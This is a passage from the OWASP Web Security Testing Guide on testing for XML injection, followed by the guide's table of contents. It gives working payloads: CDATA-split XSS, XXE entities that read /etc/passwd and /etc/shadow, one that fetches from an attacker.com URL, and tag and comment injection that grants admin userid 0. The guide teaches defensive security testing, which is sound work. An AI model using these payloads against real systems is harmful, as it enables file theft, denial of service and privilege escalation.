<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
</users>
When a user registers himself by filling an HTML form, the application receives the user’s data in a standard request, which, for the sake of simplicity, will be supposed to be sent as a GET
request.
For example, the following values:
Username: tony
Password: Un6R34kb!e
E-mail: [email protected]
will produce the request:
http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&[email protected]
The application, then, builds the following node:
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
which will be added to the xmlDB:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
</users>
Discovery
The first step in order to test an application for the presence of a XML Injection vulnerability consists of trying to insert XML metacharacters.
XML metacharacters are:
Single quote: '
- When not sanitized, this character could throw an exception during XML parsing, if the injected value is going to be part of an attribute value in a tag.
As an example, let’s suppose there is the following attribute:
<node attrib='$inputValue'/>
So, if:
inputValue = foo'
is instantiated and then is inserted as the attrib value:
<node attrib='foo''/>
then, the resulting XML document is not well formed.
Double quote: "
- this character has the same meaning as single quote and it could be used if the attribute value is enclosed in double quotes.
<node attrib="$inputValue"/>
So if:
$inputValue = foo"
the substitution gives:
<node attrib="foo""/>
and the resulting XML document is invalid.
Angular parentheses: >
and <
- By adding an open or closed angular parenthesis in a user input like the following:
Username = foo<
the application will build a new node:
<username>foo<</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
but, because of the presence of the open ‘<’, the resulting XML document is invalid.
Comment tag: <!--/-->
- This sequence of characters is interpreted as the beginning/end of a comment. So by injecting one of them in Username parameter:
Username = foo<!--
the application will build a node like the following:
<username>foo<!--</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
which won’t be a valid XML sequence.
Ampersand: &
- The ampersand is used in the XML syntax to represent entities. The format of an entity is &symbol;
. An entity is mapped to a character in the Unicode character set.
For example:
<tagnode><</tagnode>
is well formed and valid, and represents the <
ASCII character.
If &
is not encoded itself with &
, it could be used to test XML injection.
In fact, if an input like the following is provided:
Username = &foo
a new node will be created:
<username>&foo</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
but, again, the document is not valid: &foo
is not terminated with ;
and the &foo;
entity is undefined.
CDATA section delimiters: <!\[CDATA\[ / ]]>
- CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.
For example, if there is the need to represent the string <foo>
inside a text node, a CDATA section may be used:
<![CDATA[<foo>]]>
</node>
so that <foo>
won’t be parsed as markup and will be considered as character data.
If a node is created in the following way:
<username><![CDATA[<$userName]]></username>
the tester could try to inject the end CDATA string ]]>
in order to try to invalidate the XML document.
userName = ]]>
this will become:
<username><![CDATA[]]>]]></username>
which is not a valid XML fragment.
Another test is related to CDATA tag. Suppose that the XML document is processed to generate an HTML page. In this case, the CDATA section delimiters may be simply eliminated, without further inspecting their contents. Then, it is possible to inject HTML tags, which will be included in the generated page, completely bypassing existing sanitization routines.
Let’s consider a concrete example. Suppose we have a node containing some text that will be displayed back to the user.
$HTMLCode
</html>
Then, an attacker can provide the following input:
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
and obtain the following node:
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
</html>
During the processing, the CDATA section delimiters are eliminated, generating the following HTML code:
<script>
alert('XSS')
</script>
The result is that the application is vulnerable to XSS.
External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.
To test for XXE vulnerabilities, one can use the following input:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]>
<foo>&xxe;</foo>
This test could crash the web server (on a UNIX system), if the XML parser attempts to substitute the entity with the contents of the /dev/random file.
Other useful tests are the following:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]><foo>&xxe;</foo>
Tag Injection
Once the first step is accomplished, the tester will have some information about the structure of the XML document. Then, it is possible to try to inject XML data and tags. We will show an example of how this can lead to a privilege escalation attack.
Let’s considering the previous application. By inserting the following values:
Username: tony
Password: Un6R34kb!e
E-mail: [email protected]</mail><userid>0</userid><mail>[email protected]
the application will build a new node and append it to the XML database:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>[email protected]</mail>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
</users>
The resulting XML file is well formed. Furthermore, it is likely that, for the user tony, the value associated with the userid tag is the one appearing last, i.e., 0 (the admin ID). In other words, we have injected a user with administrative privileges.
The only problem is that the userid tag appears twice in the last user node. Often, XML documents are associated with a schema or a DTD and will be rejected if they don’t comply with it.
Let’s suppose that the XML document is specified by the following DTD:
<!DOCTYPE users [
<!ELEMENT users (user+) >
<!ELEMENT user (username,password,userid,mail+) >
<!ELEMENT username (#PCDATA) >
<!ELEMENT password (#PCDATA) >
<!ELEMENT userid (#PCDATA) >
<!ELEMENT mail (#PCDATA) >
Note that the userid node is defined with cardinality 1. In this case, the attack we have shown before (and other simple attacks) will not work, if the XML document is validated against its DTD before any processing occurs.
However, this problem can be solved, if the tester controls the value of some nodes preceding the offending node (userid, in this example). In fact, the tester can comment out such node, by injecting a comment start/end sequence:
Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><userid>0</userid><mail>[email protected]
In this case, the final XML database is:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>[email protected]</mail>
</user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>[email protected]</mail>
</user>
<username>tony</username>
<password>Un6R34kb!e</password><!--</password>
<userid>500</userid>
<mail>--><userid>0</userid><mail>[email protected]</mail>
</user>
</users>
The original userid
node has been commented out, leaving only the injected one. The document now complies with its DTD rules.
Source Code Review
The following Java API may be vulnerable to XXE if they are not configured properly.
javax.xml.parsers.DocumentBuilder
javax.xml.parsers.DocumentBuildFactory
org.xml.sax.EntityResolver
org.dom4j.*
javax.xml.parsers.SAXParser
javax.xml.parsers.SAXParserFactory
TransformerFactory
SAXReader
DocumentHelper
SAXBuilder
SAXParserFactory
XMLReaderFactory
XMLInputFactory
SchemaFactory
DocumentBuilderFactoryImpl
SAXTransformerFactory
DocumentBuilderFactoryImpl
XMLReader
Xerces: DOMParser, DOMParserImpl, SAXParser, XMLParser
Check source code if the docType, external DTD, and external parameter entities are set as forbidden uses.
XML External Entity (XXE) Prevention Cheat Sheet
In addition, the Java POI office reader may be vulnerable to XXE if the version is under 3.10.1.
The version of POI library can be identified from the filename of the JAR. For example,
poi-3.8.jar
poi-ooxml-3.8.jar
The followings source code keyword may apply to C.
libxml2: xmlCtxtReadMemory,xmlCtxtUseOptions,xmlParseInNodeContext,xmlReadDoc,xmlReadFd,xmlReadFile ,xmlReadIO,xmlReadMemory, xmlCtxtReadDoc ,xmlCtxtReadFd,xmlCtxtReadFile,xmlCtxtReadIO
libxerces-c: XercesDOMParser, SAXParser, SAX2XMLReader
XML Injection Fuzz Strings (from wfuzz tool)
References
XML Injection
Gregory Steuck, “XXE (Xml eXternal Entity) attack”
OWASP XXE Prevention Cheat Sheet
The OWASP® Foundation works to improve the security of software through its community-led open source software projects,
hundreds of chapters worldwide, tens of thousands of members, and by hosting local and global conferences.
2.9 Deriving Security Test Requirements
2.10 Security Tests Integrated in Development and Testing Workflows
2.11 Security Test Data Analysis and Reporting
3. The OWASP Testing Framework
3.1 The Web Security Testing Framework
3.2 Phase 1 Before Development Begins
3.3 Phase 2 During Definition and Design
3.4 Phase 3 During Development
3.5 Phase 4 During Deployment
3.6 Phase 5 During Maintenance and Operations
3.7 A Typical SDLC Testing Workflow
3.8 Penetration Testing Methodologies
4. Web Application Security Testing
4.0 Introduction and Objectives
4.1 Information Gathering
4.1.1 Conduct Search Engine Discovery Reconnaissance for Information Leakage
4.1.2 Fingerprint Web Server
4.1.3 Review Webserver Metafiles for Information Leakage
4.1.4 Enumerate Applications on Webserver
4.1.5 Review Web Page Content for Information Leakage
4.1.6 Identify Application Entry Points
4.1.7 Map Execution Paths Through Application
4.1.8 Fingerprint Web Application Framework
4.1.9 Fingerprint Web Application
4.1.10 Map Application Architecture
4.2 Configuration and Deployment Management Testing
4.2.1 Test Network Infrastructure Configuration
4.2.2 Test Application Platform Configuration
4.2.3 Test File Extensions Handling for Sensitive Information
4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information
4.2.5 Enumerate Infrastructure and Application Admin Interfaces
4.2.6 Test HTTP Methods
4.2.7 Test HTTP Strict Transport Security
4.2.8 Test RIA Cross Domain Policy
4.2.9 Test File Permission
4.2.10 Test for Subdomain Takeover
4.2.11 Test Cloud Storage
4.2.12 Test for Content Security Policy
4.2.13 Test for Path Confusion
4.3 Identity Management Testing
4.3.1 Test Role Definitions
4.3.2 Test User Registration Process
4.3.3 Test Account Provisioning Process
4.3.4 Testing for Account Enumeration and Guessable User Account
4.3.5 Testing for Weak or Unenforced Username Policy
4.4 Authentication Testing
4.4.1 Testing for Credentials Transported over an Encrypted Channel
4.4.2 Testing for Default Credentials
4.4.3 Testing for Weak Lock Out Mechanism
4.4.4 Testing for Bypassing Authentication Schema
4.4.5 Testing for Vulnerable Remember Password
4.4.6 Testing for Browser Cache Weaknesses
4.4.7 Testing for Weak Password Policy
4.4.8 Testing for Weak Security Question Answer
4.4.9 Testing for Weak Password Change or Reset Functionalities
4.4.10 Testing for Weaker Authentication in Alternative Channel
4.4.11 Testing Multi-Factor Authentication
4.5 Authorization Testing
4.5.1 Testing Directory Traversal File Include
4.5.2 Testing for Bypassing Authorization Schema
4.5.3 Testing for Privilege Escalation
4.5.4 Testing for Insecure Direct Object References
4.5.5 Testing for OAuth Weaknesses
4.5.5.1 Testing for OAuth Authorization Server Weaknesses
4.5.5.2 Testing for OAuth Client Weaknesses
4.6 Session Management Testing
4.6.1 Testing for Session Management Schema
4.6.2 Testing for Cookies Attributes
4.6.3 Testing for Session Fixation
4.6.4 Testing for Exposed Session Variables
4.6.5 Testing for Cross Site Request Forgery
4.6.6 Testing for Logout Functionality
4.6.7 Testing Session Timeout
4.6.8 Testing for Session Puzzling
4.6.9 Testing for Session Hijacking
4.6.10 Testing JSON Web Tokens
4.7 Input Validation Testing
4.7.1 Testing for Reflected Cross Site Scripting
4.7.2 Testing for Stored Cross Site Scripting
4.7.3 Testing for HTTP Verb Tampering
4.7.4 Testing for HTTP Parameter Pollution
4.7.5 Testing for SQL Injection
4.7.5.1 Testing for Oracle
4.7.5.2 Testing for MySQL
4.7.5.3 Testing for SQL Server
4.7.5.4 Testing PostgreSQL
4.7.5.5 Testing for MS Access
4.7.5.6 Testing for NoSQL Injection
4.7.5.7 Testing for ORM Injection
4.7.5.8 Testing for Client-side
4.7.6 Testing for LDAP Injection
4.7.7 Testing for XML Injection
4.7.8 Testing for SSI Injection
4.7.9 Testing for XPath Injection
4.7.10 Testing for IMAP SMTP Injection
4.7.11 Testing for Code Injection
4.7.11.1 Testing for File Inclusion
4.7.12 Testing for Command Injection
4.7.13 Testing for Format String Injection
4.7.14 Testing for Incubated Vulnerability
4.7.15 Testing for HTTP Splitting Smuggling
4.7.16 Testing for HTTP Incoming Requests
4.7.17 Testing for Host Header Injection
4.7.18 Testing for Server-side Template Injection
4.7.19 Testing for Server-Side Request Forgery
4.7.20 Testing for Mass Assignment
4.8 Testing for Error Handling
4.8.1 Testing for Improper Error Handling
4.8.2 Testing for Stack Traces
4.9 Testing for Weak Cryptography
4.9.1 Testing for Weak Transport Layer Security
4.9.2 Testing for Padding Oracle
4.9.3 Testing for Sensitive Information Sent via Unencrypted Channels
4.9.4 Testing for Weak Encryption
4.10 Business Logic Testing
4.10.0 Introduction to Business Logic
4.10.1 Test Business Logic Data Validation
4.10.2 Test Ability to Forge Requests
4.10.3 Test Integrity Checks
4.10.4 Test for Process Timing
4.10.5 Test Number of Times a Function Can Be Used Limits
4.10.6 Testing for the Circumvention of Work Flows
4.10.7 Test Defenses Against Application Misuse
4.10.8 Test Upload of Unexpected File Types
4.10.9 Test Upload of Malicious Files
4.10.10 Test Payment Functionality
4.11 Client-side Testing
4.11.1 Testing for DOM-Based Cross Site Scripting
4.11.1.1 Testing for Self DOM Based Cross-Site Scripting
4.11.2 Testing for JavaScript Execution
4.11.3 Testing for HTML Injection
4.11.4 Testing for Client-side URL Redirect
4.11.5 Testing for CSS Injection
4.11.6 Testing for Client-side Resource Manipulation
4.11.7 Testing Cross Origin Resource Sharing
4.11.8 Testing for Cross Site Flashing
4.11.9 Testing for Clickjacking
4.11.10 Testing WebSockets
4.11.11 Testing Web Messaging
4.11.12 Testing Browser Storage
4.11.13 Testing for Cross Site Script Inclusion
4.11.14 Testing for Reverse Tabnabbing
4.12 API Testing
4.12.1 Testing GraphQL
5. Reporting
5.1 Reporting Structure
5.2 Naming Schemes
Appendix A. Testing Tools Resource
Appendix B. Suggested Reading
Appendix C. Fuzzing
Appendix D. Encoded Injection
Appendix E. History
Appendix F. Leveraging Dev Tools